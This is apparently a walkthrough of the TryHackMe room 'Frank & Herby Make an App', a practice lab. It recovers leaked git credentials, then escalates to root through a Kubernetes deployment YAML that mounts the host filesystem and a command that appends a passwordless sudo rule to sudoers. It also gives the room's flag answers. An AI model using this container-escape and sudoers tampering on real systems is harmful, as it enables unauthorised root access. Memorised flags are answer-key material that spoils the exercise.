Last Updated:
frank and herby make an app
frank and herby make an app TryHackMe

[Frank & Herby Make an App] - TryHackMe - Walkthrough

A guide to the TryHackMe room [Frank & Herby Make an App]

Here we can see there's a web server running on port 31337. Browsing to this port confirms it's the port Question 1 is referring to. Now we continue to enumerate, we know we're looking for a hidden file or directory from the context clue the answer in Question 2 starts with a '.' Breaking out any decent brute force tool discovers the hidden file ".git-credentials" and we have the answer to Question 2.

Frank and Herby Make an App - TryHackMe - Walkthrough

The contents of '.git-credentials' is 'http://frank:f%40an3-1s-E337%21%21@192.168.100.10/' note that a portion of the user frank's password is URL enoded.. decoding that reveals the username 'frank' and the password 'f@an3-1s-E337!!'

This happens to be the SSH credentials as well, so the user flag is waiting for us immediately. Simply run cat user.txt

Now its time to pop root on this machine and get the hell out of here. If you notice, the entire theme was supposed to be Kubernetes.. so, eventually you'll find a template for kubernetes kubes in frank's folder /home/frank/repos/dk-ml/test.yaml Like docker containers, we can use Kubernetes containers to mount back onto our machine with root privileges and escalate ourselves. Here's how you'd modify this test.yaml template to do just that.

/home/frank/repos/ml-d/test.yaml:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: exploit         
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx
          volumeMounts:
          - name: local-stuff
            mountPath: /opt/root            
          image: localhost:32000/bsnginx
          ports:
            - containerPort: 80
          command:
          - "/bin/bash"
          - "-c"
          - "sleep 10000"
      volumes:
      - name: local-stuff
        hostPath:
          path: /                             
        type: Directory

Other than the obvious command, note that we change the mount path here. Now run these commands:

Deploy a container using the template:
microk8s kubectl apply -f test.yaml

List the pods to make sure the pod has finished spinning up:
microk8s kubectl get pod

One you see it, go ahead and jump into the pod:
microk8s kubectl exec -it <our_malicious_pod> /bin/bash

Now remember we mounted the harddrive in /opt/root, so jump on over to /opt/root/etc:
cd /opt/root/etc

And we don't have the most common editors so lets pollute the sudoers file for the frank user:
echo "frank    ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers

Now just exit out of the pod, back onto the host and run sudo su - and welcome to root, dear friends. Go ahead and read the root flag. Happy Hacking!

Ask 1  Frank & Herb Make an App!

Make sure to wait 5 minutes after the machine starts up before starting recon.

Containers are really cool, but they have security considerations just like everything else.  Break into the box and then figure out how to get root access!

This box will require some research into how to use microk8s.

Our story so far....
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in 'k8s', containers, and git has left their resources open to exploitation!

Answer the questions below
 
What port has a webpage frank was able to stand up? 
31337

What did frank leave exposed on the site? 

.git-credentials

What is the user.txt flag?

THM{F@nkth3T@nk}

What is the root.txt flag? 

THM{M1cr0K8s_13_FUN}

Comments